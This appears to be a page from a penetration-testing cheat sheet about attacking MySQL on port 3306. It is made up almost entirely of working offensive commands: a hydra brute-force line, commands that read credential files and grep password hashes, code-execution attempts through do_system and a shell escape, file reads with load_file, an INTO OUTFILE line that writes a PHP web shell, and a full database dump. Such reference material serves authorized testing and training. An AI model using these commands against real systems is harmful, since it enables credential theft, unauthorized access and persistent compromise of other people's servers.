MYSQL 3306

MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).

3306/tcp open mysql

  • Brute force

hydra -L <USERS_LIST> -P <PASSWORDS_LIST> <IP> mysql -vV -I -u

  • Extracting MySQL credentials from files

cat /etc/mysql/debian.cnf grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

  • Connect

Local

mysql -u <USER> mysql -u <USER> -p

Remote

mysql -h <IP> -u <USER>

  • MySQL commands

show databases; use <DATABASES>;

show tables; describe <TABLE>;

select * from <TABLE>;

Try to execute code

select do_system('id'); \! sh

Read & Write

select load_file('<FILE>'); select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE '<OUT_FILE>'

  • Dump databases

mysqldump -u <sqluser> -h <sqlhostname ir IP> -p <sqlpasswd> --all-databases > dump. txt

PreviousMSSQL 1433NextVNC 5800,5801,5900,5901

Last updated